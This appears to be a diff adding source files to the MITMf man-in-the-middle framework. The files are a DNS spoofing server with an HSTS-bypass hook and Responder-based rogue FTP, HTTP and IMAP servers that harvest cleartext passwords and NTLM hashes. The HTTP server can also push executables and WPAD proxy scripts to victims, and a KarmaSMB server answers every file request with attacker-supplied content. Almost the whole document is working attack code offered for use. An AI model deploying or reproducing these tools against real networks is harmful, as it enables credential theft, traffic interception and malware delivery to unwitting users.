# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
class DNSChef(ConfigWatcher):
version = "0.4"
tcp = False
ipv6 = False
hsts = False
real_records = {}
nametodns = {}
server_address = "0.0.0.0"
nameservers = ["8.8.8.8"]
port = 53
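# Borg pattern: every DNSChef() instance shares the same __dict__, so the
# configuration parsed once in on_config_change() is visible to all handlers.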
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def on_config_change(self):
config = self.config['MITMf']['DNS']
self.port = int(config['port'])
# Main storage of domain filters
# NOTE: RDMAP is a dictionary map of qtype strings to handling classes
for qtype in RDMAP.keys():
self.nametodns[qtype] = dict()
# Adjust defaults for IPv6
if config['ipv6'].lower() == 'on':
self.ipv6 = True
if config['nameservers'] == "8.8.8.8":
self.nameservers = "2001:4860:4860::8888"
# Use alternative DNS servers
if config['nameservers']:
self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections:
if section in self.nametodns:
for domain,record in config[section].iteritems():
# Make domain case insensitive
domain = domain.lower()
self.nametodns[section][domain] = record
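# Keep a lookup of the SSLstrip+ domain pairs so the DNS handler can map a
# spoofed hostname back to its real counterpart for the HSTS bypass.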
for k,v in self.config["SSLstrip+"].iteritems():
self.real_records[v] = k
def setHstsBypass(self):
self.hsts = True
def start(self):
self.on_config_change()
self.start_config_watch()
try:
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
self.startTCP()
else:
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
# Initialize and start the DNS Server
def startUDP(self):
server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
# Initialize and start the DNS Server
def startTCP(self):
server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()

87
core/servers/FTP.py Normal file

@@ -0,0 +1,87 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
import core.responder.settings as settings   # explicit import; may also be provided via the utils wildcard import
from traceback import print_exc              # used in the error handler in FTP.start()
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import FTPPacket
class FTP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 21), FTP1)
else:
server = ThreadingTCPServer(('', 21), FTP1)
t = threading.Thread(name='FTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
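# Option 25 is SO_BINDTODEVICE on Linux: bind the listener to the chosen interface.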
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
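# Fake FTP server: answer 331 to USER, log the cleartext USER/PASS pair, then
# reject the login with 530 so no real session is established.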
class FTP1(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(FTPPacket()))
data = self.request.recv(1024)
if data[0:4] == "USER":
User = data[5:].strip()
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(Packet))
data = self.request.recv(1024)
if data[0:4] == "PASS":
Pass = data[5:].strip()
Packet = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(Packet))
data = self.request.recv(1024)
SaveToDb({
'module': 'FTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+':'+Pass
})
else:
Packet = FTPPacket(Code="502",Message="Command not implemented.")
self.request.send(str(Packet))
data = self.request.recv(1024)
except Exception:
pass

356
core/servers/HTTP.py Normal file

@@ -0,0 +1,356 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import logging   # explicit import for the Formatter below; may also come in via the utils wildcard import
import core.responder.settings as settings
import threading
from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from base64 import b64decode, b64encode
from core.responder.utils import *
from core.logger import logger
from core.responder.packets import NTLM_Challenge
from core.responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
from core.responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("HTTP", formatter)
class HTTP:
static_endpoints = {}
endpoints = {}
@staticmethod
def add_endpoint(url, content_type, payload):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
Buffer.calculate()
HTTP.endpoints['/' + url] = Buffer
@staticmethod
def add_static_endpoint(url, content_type, path):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
def start(self):
try:
#if OsInterfaceIsSupported():
#server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
#else:
server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting HTTP server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Parse NTLMv1/v2 hash.
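# An NTLM AUTHENTICATE (Type 3) message stores each field as a "security buffer":
# a 2-byte length, a 2-byte maximum length and a 4-byte offset into the message.
# The struct offsets below index those buffers to recover the LM/NT responses,
# the user name and the host/domain names.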
def ParseHTTPHash(data, client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
log.info("[HTTP] Cookie : {}".format(Cookie))
return Cookie
else:
return False
def GrabHost(data, host):
Host = re.search('(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
log.info("[HTTP] Host : {}".format(Host, 3))
return Host
else:
return False
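# Serve the WPAD proxy auto-configuration script for any request to /wpad.dat
# or to a *.pac file.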
def WpadCustom(data, client):
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
else:
return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
data = bk.read()
bk.close()
return data
def RespondWithFile(client, filename, dlname=None):
if filename.endswith('.exe'):
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
else:
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
log.info("{} [HTTP] Sending file {}".format(filename, client))
return str(Buffer)
def GrabURL(data, host):
GET = re.findall('(?<=GET )[^HTTP]*', data)
POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET:
req = ''.join(GET).strip()
log.info("[HTTP] {} - - GET '{}'".format(host, req))
return req
if POST:
req = ''.join(POST).strip()
log.info("[HTTP] {} - - POST '{}'".format(host, req))
if len(''.join(POSTDATA)) > 2:
log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
return req
# Handle HTTP packet sequence.
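# NTLM over HTTP is a three-message exchange: byte 8 of the base64-decoded blob
# is the message type, so \x01 (NEGOTIATE) is answered with our NTLM challenge
# and \x03 (AUTHENTICATE) contains the responses that ParseHTTPHash extracts.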
def PacketSequence(data, client):
NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
if settings.Config.Serve_Html == True:
return RespondWithFile(client, settings.Config.Html_Filename)
WPAD_Custom = WpadCustom(data, client)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(Buffer))
return str(Buffer_Ans)
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
log.info("{} [HTTP] WPAD (auth) file sent".format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
SaveToDb({
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.split(':')[0],
'cleartext': ClearText_Auth.split(':')[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
else:
if settings.Config.Basic == True:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending BASIC authentication request".format(client))
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
# HTTP Server class
class HTTP1(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(1)
data = self.request.recv(8092)
req_url = GrabURL(data, self.client_address[0])
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
resp = HTTP.endpoints[req_url.strip()]
self.request.send(str(resp))
if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
path = HTTP.static_endpoints[req_url.strip()]['path']
Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
with open(path, 'r') as file:
Buffer.fields['Payload'] = file.read()
Buffer.calculate()
self.request.send(str(Buffer))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.request.send(Buffer)
except socket.error:
pass
# HTTPS Server class
class HTTPS(StreamRequestHandler):
def setup(self):
self.exchange = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def handle(self):
try:
while True:
data = self.exchange.recv(8092)
self.exchange.settimeout(0.5)
Buffer = WpadCustom(data,self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.exchange.send(Buffer)
except:
pass
# SSL context handler
class SSLSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
from OpenSSL import SSL
BaseServer.__init__(self, server_address, RequestHandlerClass)
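# NOTE: SSLv3 is obsolete and disabled in modern OpenSSL builds, so
# SSLv3_METHOD may be unavailable there.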
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self,request):
try:
request.shutdown()
except:
pass

84
core/servers/IMAP.py Normal file

@@ -0,0 +1,84 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from traceback import print_exc   # used in the error handler in IMAP.start()
import core.responder.settings as settings
import threading
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 143), IMAP4)
else:
server = ThreadingTCPServer(('', 143), IMAP4)
t = threading.Thread(name='IMAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting IMAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# IMAP4 Server class
class IMAP4(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
data = self.request.recv(1024)
if data[5:15] == "CAPABILITY":
RequestTag = data[0:4]
self.request.send(str(IMAPCapability()))
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
data = self.request.recv(1024)
if data[5:10] == "LOGIN":
# LOGIN <user> <pass> -- split into the two cleartext values (quoted arguments are not handled)
Credentials = data[10:].strip().split(' ', 1)
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[0],
'cleartext': Credentials[1],
'fullhash': Credentials[0]+":"+Credentials[1],
})
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
except Exception:
pass

579
core/servers/KarmaSMB.py Executable file

@@ -0,0 +1,579 @@
#!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script w/o a config file the pathname
# file contents will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
infoRecord = None   # avoid a NameError below if the query raises before infoRecord is set
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
